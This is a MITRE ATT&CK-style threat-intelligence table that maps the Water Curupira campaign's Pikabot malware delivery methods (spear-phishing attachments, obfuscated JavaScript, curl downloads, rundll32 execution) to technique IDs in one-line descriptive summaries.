Water Curupira Pikabot Distribution, Campaign C0037 (original) (raw)

Domain	ID	Name	Use
Enterprise	T1059	.003	Command and Scripting Interpreter: Windows Command Shell	Water Curupira Pikabot Distribution installation via JavaScript will launch follow-on commands via cmd.exe.[1]
.007	Command and Scripting Interpreter: JavaScript	Water Curupira Pikabot Distribution initial delivery included obfuscated JavaScript objects stored in password-protected ZIP archives.[1]
Enterprise	T1140	Deobfuscate/Decode Files or Information	Water Curupira Pikabot Distribution used highly obfuscated JavaScript files as one initial installer for Pikabot.[1]
Enterprise	T1589	.002	Gather Victim Identity Information: Email Addresses	Water Curupira Pikabot Distribution utilizes thread spoofing of existing email threads in order to execute spear phishing operations.[1]
Enterprise	T1105	Ingress Tool Transfer	Water Curupira Pikabot Distribution used Curl.exe to download the Pikabot payload from an external server, saving the file to the victim machine's temporary directory.[1]
Enterprise	T1566	.001	Phishing: Spearphishing Attachment	Water Curupira Pikabot Distribution attached password-protected ZIP archives to deliver Pikabot installers.[1]
Enterprise	T1218	.011	System Binary Proxy Execution: Rundll32	Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports Crash or Limit depending on the variant.[1]
Enterprise	T1204	User Execution	Water Curupira Pikabot Distribution requires users to interact with malicious attachments in order to start Pikabot installation.[1]
.001	Malicious Link	Water Curupira Pikabot Distribution distributed a PDF attachment containing a malicious link to a Pikabot installer.[1]
.002	Malicious File	Water Curupira Pikabot Distribution delivered Pikabot installers as password-protected ZIP files containing heavily obfuscated JavaScript, or IMG files containing an LNK mimicking a Word document and a malicious DLL.[1]